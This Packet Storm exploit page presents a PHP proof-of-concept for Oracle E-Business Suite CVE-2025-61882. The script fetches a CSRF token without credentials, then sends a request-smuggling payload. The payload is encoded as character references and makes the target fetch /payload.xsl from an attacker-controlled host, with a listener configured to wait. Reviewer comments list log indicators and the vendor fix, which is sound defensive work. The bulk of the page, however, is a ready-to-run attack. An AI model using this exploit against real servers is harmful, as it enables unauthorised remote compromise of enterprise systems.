
📄 Oracle E-Business Suite 12.2.3 Request Smuggling

🗓️ 30 Jan 2026 00:00:00 · Reported by indoushka · Type: packetstorm · 🔗 packetstorm.news · 👁 127 Views

Refined PoC for Oracle E-Business Suite CVE-2025-61882; it fixes the request-smuggling payload construction and the CSRF token extraction, and makes URL handling more robust for testing.

=============================================================================================================================================
    | # Title     : Oracle E-Business Suite 12.2.3 through 12.2.14 Corrected Request Smuggling Exploit with Enhanced CSRF Token Extraction      |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.oracle.com/applications/ebusiness/                                                                              |
    =============================================================================================================================================
    
    [+] References: https://packetstorm.news/files/id/214189/ & CVE-2025-61882
    
    [+] Summary: This script is a refined proof-of-concept targeting Oracle E‑Business Suite (EBS) vulnerability CVE‑2025‑61882. 
                 It corrects logical flaws in request smuggling payload construction, particularly around request termination and CRLF preservation, ensuring reliable proxy/backend desynchronization. 
    			 The exploit also improves CSRF token extraction by prioritizing response headers (modern EBS behavior) with a fallback to parsing the response body. 
    			 Additional fixes harden URL parsing (scheme/host/port handling) to avoid runtime warnings while preserving the original structure. 
                 The result is a more stable, context-aware exploit workflow suitable for controlled security testing and research.
    
    [+] POC : php poc.php 
    
    <?php
    
    /**
     * Proof-of-concept client for CVE-2025-61882 in Oracle E-Business Suite, as published on this page.
     *
     * Network behaviour visible in this class, usable as detection anchors in web and proxy logs:
     *  - a POST to /OA_HTML/JavaScriptServlet carrying the headers "CSRF-XHR: YES" and
     *    "FETCH-CSRF-TOKEN: 1", sent with no cookie or other credential;
     *  - a POST to /OA_HTML/configurator/UiServlet with redirectFromJsp=1 and a getUiType XML
     *    document whose return_url parameter is followed by long runs of decimal character
     *    references (&#NN;) separated by raw CR/LF;
     *  - the fixed User-Agent strings set below (trivially changed, so weak indicators on their own).
     *
     * NOTE(review): the embedded request names /payload.xsl on a caller-chosen host, so an affected
     * server presumably makes an outbound HTTP fetch to that host; unexpected outbound requests from
     * the EBS application tier are worth alerting on. Confirm against the vendor advisory.
     * Remediation is the vendor fix published for CVE-2025-61882; this class contains no check for
     * whether a target is patched.
     *
     * $lhost, $lport, $cookies and $verbose are assigned but never read anywhere in this class.
     */
    class OracleEBSCVE202561882Exploit {
        // Host part of the target URL after the constructor has parsed it.
        private $target;
        // Default only; overwritten whenever a target URL is parsed successfully.
        private $targetPort = 8000;
        // Host and port used to build the payload.xsl URL in exploit().
        private $srvHost;
        private $srvPort;
        // Stored from the options array; not used by any method below.
        private $lhost;
        private $lport;
        // Stored from the options array; log() prints unconditionally and does not consult it.
        private $verbose = false;
        // Never read or written after initialisation.
        private $cookies = [];
        // Sent on every request made through httpRequest().
        private $userAgent = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36';
        private $useHttps = false;
    
        /**
         * Copies the options into properties and splits the target URL into host, port and scheme.
         *
         * @param array $options Keys read: target, lhost, lport, srvHost, srvPort, verbose.
         *                       srvHost defaults to 127.0.0.1 and srvPort to 8080.
         */
        public function __construct($options) {
            $this->target   = $options['target'] ?? null;
            $this->lhost    = $options['lhost'] ?? null;
            $this->lport    = $options['lport'] ?? null;
            $this->srvHost  = $options['srvHost'] ?? '127.0.0.1';
            $this->srvPort  = $options['srvPort'] ?? 8080;
            $this->verbose  = $options['verbose'] ?? false;
    
            if ($this->target) {
                $parsed = parse_url($this->target);
                if ($parsed !== false) {
                    // A missing scheme is treated as plain http.
                    $scheme = $parsed['scheme'] ?? 'http';
                    $this->useHttps = ($scheme === 'https');
                    // Falls back to the raw option value when parse_url() finds no host component.
                    $this->target = $parsed['host'] ?? $this->target;
                    // Without an explicit port the scheme default (443 or 80) replaces the 8000 default.
                    $this->targetPort = $parsed['port'] ?? ($this->useHttps ? 443 : 80);
                }
            }
        }
    
        /**
         * Requests a CSRF token from /OA_HTML/JavaScriptServlet.
         *
         * The request is an empty-body POST with three fixed headers and no credentials. The response
         * is searched first for an X-ORACLE-DBC-CSRF-TOKEN header, then for a "csrfToken" JSON field.
         *
         * @return string|false The token, or false when neither pattern matches.
         */
        private function retrieveCsrfTokenImproved() {
            $url = $this->buildUrl('/OA_HTML/JavaScriptServlet');
            $headers = [
                'CSRF-XHR: YES',
                'FETCH-CSRF-TOKEN: 1',
                'X-Requested-With: XMLHttpRequest'
            ];
    
            // The final argument asks httpRequest() to include response headers in the returned text,
            // which is what lets the first pattern below see a header line.
            $response = $this->httpRequest('POST', $url, '', $headers, true);
    
            // Header form: case-insensitive name, value limited to letters, digits and hyphens.
            if (preg_match('/X-ORACLE-DBC-CSRF-TOKEN:\s*([a-zA-Z0-9\-]+)/i', $response, $m)) {
                return trim($m[1]);
            }
    
            // Body form: a JSON-style "csrfToken":"..." pair anywhere in the response text.
            if (preg_match('/"csrfToken"\s*:\s*"([^"]+)"/', $response, $m)) {
                return $m[1];
            }
    
            return false;
        }
    
        /**
         * Builds the text appended to return_url: "0\r\n\r\n" followed by a complete GET request.
         *
         * The leading "0\r\n\r\n" looks like a chunked-encoding terminator (assumption; the page's
         * summary only speaks of "request termination"). The result is passed through
         * encodeSmugglePayload() before being returned.
         *
         * @param string $xslUrl URL whose host and path are copied into the embedded request.
         * @return string Encoded payload text.
         */
        private function createSmugglePayloadImproved($xslUrl) {
            $parsedXsl = parse_url($xslUrl);
            $xslHost = $parsedXsl['host'] ?? $this->srvHost;
            $xslPath = $parsedXsl['path'] ?? '/payload.xsl';
            // The embedded request carries its own fixed User-Agent, distinct from $this->userAgent.
            $smuggled  = "GET {$xslPath} HTTP/1.1\r\n";
            $smuggled .= "Host: {$xslHost}\r\n";
            $smuggled .= "User-Agent: Oracle-Internal/1.0\r\n";
            $smuggled .= "Connection: keep-alive\r\n\r\n";
            $payload  = "0\r\n\r\n";
            $payload .= $smuggled;
    
            return $this->encodeSmugglePayload($payload);
        }
    
        /**
         * Rewrites every byte except CR and LF as a decimal character reference (&#N;).
         *
         * CR and LF are copied through unchanged, so the output keeps its line structure while all
         * other characters are hidden from plain string matching until the XML is decoded.
         * Inspection that matches on the decoded form of getUiType is not affected by this encoding.
         *
         * @param string $payload Raw text; processed byte by byte (strlen/ord, not multibyte aware).
         * @return string Encoded text.
         */
        private function encodeSmugglePayload($payload) {
            $encoded = '';
            $len = strlen($payload);
            for ($i = 0; $i < $len; $i++) {
                $c = $payload[$i];
                if ($c === "\r" || $c === "\n") {
                    $encoded .= $c;
                } else {
                    $encoded .= '&#' . ord($c) . ';';
                }
            }
            return $encoded;
        }
    
        /**
         * Runs the two-request sequence: token fetch, then the POST to UiServlet.
         *
         * Nothing in this method starts an HTTP server or a listener, and the response to the second
         * request is discarded, so the method reports "Payload sent" whether or not the target reacted.
         */
        public function exploit() {
            $this->log("Attempting to retrieve CSRF token...", "info");
            $token = $this->retrieveCsrfTokenImproved();
    
            // A missing token is only logged; the second request is sent regardless.
            if (!$token) {
                $this->log("Failed to retrieve CSRF token, smuggling may be unreliable.", "warning");
            }
    
            $xslUrl = "http://{$this->srvHost}:{$this->srvPort}/payload.xsl";
            $smuggleData = $this->createSmugglePayloadImproved($xslUrl);
            // The encoded text is concatenated directly after a fixed host name inside return_url.
            $xml  = "<?xml version='1.0' encoding='UTF-8'?>";
            $xml .= "<initialize>";
            $xml .= "<param name='return_url'>http://internal.ebs.local{$smuggleData}</param>";
            $xml .= "<param name='ui_type'>Applet</param>";
            $xml .= "</initialize>";
    
            $url = $this->buildUrl('/OA_HTML/configurator/UiServlet');
            // http_build_query() URL-encodes the XML, so the raw CR/LF appear percent-encoded in the
            // form body that reaches the server.
            $postData = http_build_query([
                'redirectFromJsp' => '1',
                'getUiType'      => $xml,
                'oa_csrf_token'  => $token
            ]);
    
            $this->log("Sending smuggling payload to UiServlet...", "info");
            $this->httpRequest('POST', $url, $postData, [
                'Content-Type: application/x-www-form-urlencoded'
            ]);
    
            $this->log("Payload sent. Monitor your HTTP server and listener.", "success");
        }
    
        /**
         * Sends one HTTP request with cURL and returns the response text.
         *
         * @param string $method     HTTP method, set through CURLOPT_CUSTOMREQUEST.
         * @param string $url        Full request URL.
         * @param string $data       Request body; attached only when $method is 'POST'.
         * @param array  $headers    Extra header lines, appended after the User-Agent header.
         * @param bool   $returnFull When true, response headers are included in the returned text.
         * @return string|bool Whatever curl_exec() returns; callers in this class do not test for false.
         */
        private function httpRequest($method, $url, $data = '', $headers = [], $returnFull = false) {
            $ch = curl_init($url);
            curl_setopt_array($ch, [
                CURLOPT_RETURNTRANSFER => true,
                // Peer certificate verification is switched off, so any certificate is accepted.
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_CUSTOMREQUEST  => $method,
                CURLOPT_HEADER         => $returnFull,
                CURLOPT_HTTPHEADER     => array_merge(
                    ["User-Agent: {$this->userAgent}"],
                    $headers
                )
            ]);
    
            if ($method === 'POST') {
                curl_setopt($ch, CURLOPT_POSTFIELDS, $data);
            }
    
            // No timeout option is set above, so cURL's defaults apply.
            $response = curl_exec($ch);
            curl_close($ch);
            return $response;
        }
    
        /**
         * Joins scheme, parsed host, port and the given path into a URL.
         *
         * @param string $path Absolute path beginning with '/'.
         * @return string URL; the port is always written, including 80 and 443.
         */
        private function buildUrl($path) {
            $scheme = $this->useHttps ? 'https' : 'http';
            return "{$scheme}://{$this->target}:{$this->targetPort}{$path}";
        }
    
        /**
         * Prints one "[type] message" line to standard output.
         *
         * @param string $msg  Message text.
         * @param string $type Label printed in brackets (info, warning, success in this file).
         */
        private function log($msg, $type) {
            echo "[{$type}] {$msg}\n";
        }
    }
    
    // Sample configuration hard-coded by the PoC author; every address is in private (RFC 1918)
    // space. 'lhost' and 'lport' are passed in, but the class above only stores them and never
    // reads them back. 'verbose' is not set here.
    $options = [
        'target'  => 'http://192.168.1.100:8000',
        'lhost'   => '192.168.1.50',
        'lport'   => 4444,
        'srvHost' => '192.168.1.50',
        'srvPort' => 8080
    ];
    
    // The script acts as soon as it is executed: there is no argument parsing or confirmation
    // step between loading the file and the two outbound requests.
    $exploit = new OracleEBSCVE202561882Exploit($options);
    $exploit->exploit();
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================


30 Jan 2026 00:00 (current)
Vulners AI Score: 5.9 (Medium risk)
CVSS 3.1: 9.8
EPSS: 0.8949